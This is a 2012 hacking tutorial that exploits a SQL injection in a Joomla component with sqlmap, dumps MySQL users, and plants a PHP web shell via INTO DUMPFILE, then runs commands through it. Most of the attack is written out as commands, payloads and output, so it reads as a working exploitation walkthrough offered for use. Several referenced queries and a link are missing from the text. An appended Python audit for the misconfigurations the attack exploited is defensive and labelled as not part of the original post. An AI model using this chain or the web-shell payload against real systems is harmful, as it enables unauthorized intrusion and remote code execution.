Imagine that our site is vulnerable to SQL Injection in the following link:
First we will try to exploit it with sqlmap:
root@bt:/sqlmap# ./sqlmap.py -u "http://www.foo.org/index.php?" --data "option=com_aardvertiser&cat_name=user&task=view" -p cat_name --dbs
[03:18:19] [WARNING] POST parameter 'cat_name' is not injectable
[03:18:19] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details
[*] shutting down at: 03:18:19
All parameters appear to be not injectable, so we will raise the --level and --risk values so that sqlmap runs more tests:
root@bt:/sqlmap# ./sqlmap.py -u "http://www.foo.org/index.php?" --data "option=com_aardvertiser&cat_name=user&task=view" -p cat_name --dbs --level=5 --risk=3
[03:21:02] [INFO] checking if the injection point on POST parameter 'cat_name' is a false positive
POST parameter 'cat_name' is vulnerable. Do you want to keep testing the others? [y/N] y
sqlmap identified the following injection points with a total of 537 HTTP(s) requests:
---
Place: POST
Parameter: cat_name
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: option=com_aardvertiser&cat_name=-6470' OR NOT (1875=1875)# &task=view
---
[03:21:22] [INFO] manual usage of POST payloads requires url encoding
[03:21:22] [INFO] testing MySQL
[03:21:22] [INFO] confirming MySQL
[03:21:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
[03:21:23] [INFO] fetching database names
[03:21:23] [INFO] fetching number of databases
[03:21:23] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[03:21:23] [INFO] retrieved: 6
[03:21:24] [INFO] retrieved: information_schema
[03:21:54] [INFO] retrieved: cdcol
[03:22:03] [INFO] retrieved: joomla
[03:22:14] [INFO] retrieved: mysql
[03:22:23] [INFO] retrieved: phpmyadmin
[03:22:40] [INFO] retrieved: test
available databases [6]:
[*] cdcol
[*] information_schema
[*] joomla
[*] mysql
[*] phpmyadmin
[*] test
[03:22:48] [INFO] Fetched data logged to text files under '/sqlmap/output/www.foo.org'
[*] shutting down at: 03:22:48
It's time to enumerate the MySQL users and dump their password hashes:
root@bt:/sqlmap# ./sqlmap.py -u "http://www.foo.org/index.php?" --data "option=com_aardvertiser&cat_name=user&task=view" -p cat_name --level=5 --risk=3 --users --password
[03:23:37] [WARNING] the testable parameter 'cat_name' you provided is not inside the Cookie
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: cat_name
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: option=com_aardvertiser&cat_name=-6470' OR NOT (1875=1875)# &task=view
---
[03:23:37] [INFO] manual usage of POST payloads requires url encoding
[03:23:37] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5
[03:23:37] [INFO] fetching database users
[03:23:37] [INFO] fetching number of database users
[03:23:37] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[03:23:37] [INFO] retrieved: 5
[03:23:38] [INFO] retrieved: 'root'@'localhost'
[03:24:06] [INFO] retrieved: 'root'@'linux'
[03:24:28] [INFO] retrieved: 'pma'@'localhost'
[03:24:54] [INFO] retrieved: ''@'localhost'
[03:25:16] [INFO] retrieved: ''@'linux'
database management system users [5]:
[*] ''@'linux'
[*] ''@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'linux'
[*] 'root'@'localhost'
[03:25:33] [INFO] fetching database users password hashes
[03:25:33] [INFO] fetching database users
[03:25:33] [INFO] fetching number of password hashes for user 'root'
[03:25:33] [INFO] retrieved: 1
[03:25:34] [INFO] fetching password hashes for user 'root'
[03:25:34] [INFO] retrieved:
[03:25:35] [INFO] fetching number of password hashes for user 'pma'
[03:25:35] [INFO] retrieved: 1
[03:25:37] [INFO] fetching password hashes for user 'pma'
[03:25:37] [INFO] retrieved:
[03:25:38] [INFO] fetching number of password hashes for user ''
[03:25:38] [INFO] retrieved:
[03:25:39] [WARNING] unable to retrieve the number of password hashes for user ''
[03:25:39] [INFO] fetching number of password hashes for user ''
[03:25:39] [INFO] retrieved:
[03:25:39] [WARNING] unable to retrieve the number of password hashes for user ''
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[03:25:47] [WARNING] unknown hash Format. Please report by e-mail to sqlmap-users@lists.sourceforge.net.
[03:25:47] [WARNING] no clear password(s) found
database management system users password hashes:
[*] pma [1]:
    password hash: NULL
[*] root [1]:
    password hash: NULL
[03:25:47] [INFO] Fetched data logged to text files under '/sqlmap/output/www.foo.org'
[*] shutting down at: 03:25:47
Excellent: as we can see, the MySQL server has two users without a password (the hashes retrieved for root and pma are NULL). The next step is to try to access the database through phpMyAdmin without credentials.
Using the phpMyAdmin web interface, we will try to find MySQL's datadir with the following SQL query:
As we can see, the system uses XAMPP, and by default the XAMPP web server's document root is:
After gathering all the necessary information, we are ready to create our PHP backdoor with the following SQL query:
select "<?php system($_REQUEST['cmd']); ?>" into dumpfile '/opt/lampp/htdocs/cmd.php' --;
Let’s test our backdoor:
http://www.foo.org/cmd.php?cmd=id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
Voila!
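The chain above only worked because of three server-side conditions: accounts with no password (plus anonymous accounts), an account holding the FILE privilege, and no secure_file_priv restriction on where INTO DUMPFILE may write. As an added example that is not part of the original post, here is a small audit over constructed mysql.user rows that mirror the sqlmap output above; the column name for the password hash and the remediation syntax vary by MySQL version, as noted in the comments.

```python
# Added example: audit MySQL for the three conditions chained in the post above:
# passwordless/anonymous accounts, the FILE privilege (required for INTO DUMPFILE),
# and an unrestricted secure_file_priv. Rows are constructed here; in practice they
# come from:  SELECT user, host, <password column>, File_priv FROM mysql.user;
# where <password column> is Password on MySQL 5.0-5.6, authentication_string on 5.7+.

# Constructed to mirror the sqlmap user list above ("" = no password hash stored).
SAMPLE_USERS = [
    ("root", "localhost", "", "Y"),
    ("root", "linux", "", "Y"),
    ("pma", "localhost", "*EXAMPLEHASH00000000000000000000000000000", "N"),
    ("", "localhost", "", "N"),
    ("", "linux", "", "N"),
]

# Constructed result of SHOW VARIABLES LIKE 'secure_file_priv' ("" = no restriction).
SAMPLE_VARIABLES = {"secure_file_priv": ""}


def audit_accounts(rows):
    """Return (account, finding, remediation SQL) for each risky mysql.user row.

    Remediation uses MySQL 5.7+ syntax; on older servers use
    SET PASSWORD FOR <account> = PASSWORD('...') instead of ALTER USER.
    """
    findings = []
    for user, host, pw_hash, file_priv in rows:
        acct = f"'{user}'@'{host}'"
        if user == "":
            # Anonymous accounts match any username not listed explicitly; drop them.
            findings.append((acct, "anonymous account", f"DROP USER {acct};"))
            continue
        if not pw_hash:
            findings.append((acct, "empty password",
                             f"ALTER USER {acct} IDENTIFIED BY '<new password>';"))
        if file_priv == "Y":
            # FILE is the privilege that makes SELECT ... INTO DUMPFILE possible.
            findings.append((acct, "FILE privilege", f"REVOKE FILE ON *.* FROM {acct};"))
    return findings


def audit_file_write(variables):
    """Return None when server-side file writes are disabled, else the exposure."""
    sfp = variables.get("secure_file_priv")
    if not sfp:
        return ("secure_file_priv is unset: INTO DUMPFILE may write anywhere mysqld can, "
                "including the web root; set it to NULL or to a dedicated directory")
    if sfp.upper() == "NULL":
        return None
    return f"secure_file_priv={sfp}: file writes are confined to that directory"
```

Running audit_accounts(SAMPLE_USERS) on the constructed rows reports six findings (two per root account, one per anonymous account) and audit_file_write(SAMPLE_VARIABLES) reports the unrestricted file-write exposure.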
©2012, copyright BLACK BURN